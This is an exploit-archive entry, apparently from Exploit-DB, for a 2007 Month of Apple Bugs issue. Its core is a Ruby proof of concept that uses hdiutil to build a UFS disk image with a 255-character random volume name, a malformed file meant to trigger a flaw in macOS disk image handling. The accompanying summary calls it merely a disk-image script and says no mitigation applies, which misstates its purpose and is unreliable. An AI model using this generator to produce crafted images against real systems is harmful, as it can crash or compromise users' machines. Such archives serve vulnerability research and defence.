Creating a Disk Image with Arbitrary Volume Name

vendor:

by:

LMH

3.3

CVSS

LOW

Arbitrary Volume Name

798

CWE

Product Name:

Affected Version From:

Affected Version To:

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2007

Creating a Disk Image with Arbitrary Volume Name

The script creates a disk image with an arbitrary volume name. It uses the 'hdiutil' command-line tool to create the disk image with the specified size, file system, and volume name. The volume name is generated randomly using characters from the ASCII character set. The script then reads the created disk image and prints information about it, including the length of the volume name and the size of the disk image in bytes.

Mitigation:

There is no specific mitigation for this vulnerability as it is a script for creating disk images. However, users should be cautious when running scripts from untrusted sources and ensure that they understand the functionality and potential risks before executing them.

Source

Exploit-DB raw data:

#!/usr/bin/ruby
# (c) 2006 LMH <lmh [at] infopull.com>.
#

require 'fileutils'
require 'zlib'

hdiutil = "/usr/bin/hdiutil"
dmgname = (ARGV[0] || "MOAB-09-01-2007.dmg")
dmgsize = (ARGV[1] || "200k")
filesys = (ARGV[2] || "UFS")
volname = ""

255.times do
  volname << (i = Kernel.rand(62); i += ((i < 10) ? 48 : ((i < 36) ? 55 : 61 ))).chr
end

FileUtils.rm_f(dmgname)
system "#{hdiutil} create #{dmgname} -size #{dmgsize} -fs #{filesys} -volname #{volname}"

puts "++ reading #{dmgname}..."
dmg_stream = File.read(dmgname)
dmg_vnsize = dmg_stream[0x9c10,0x9c14].unpack("C2")
puts "++ volname length at dmg: #{dmg_vnsize}"
puts "++ dmg size: #{dmg_stream.size} bytes."

# milw0rm.com [2007-01-09]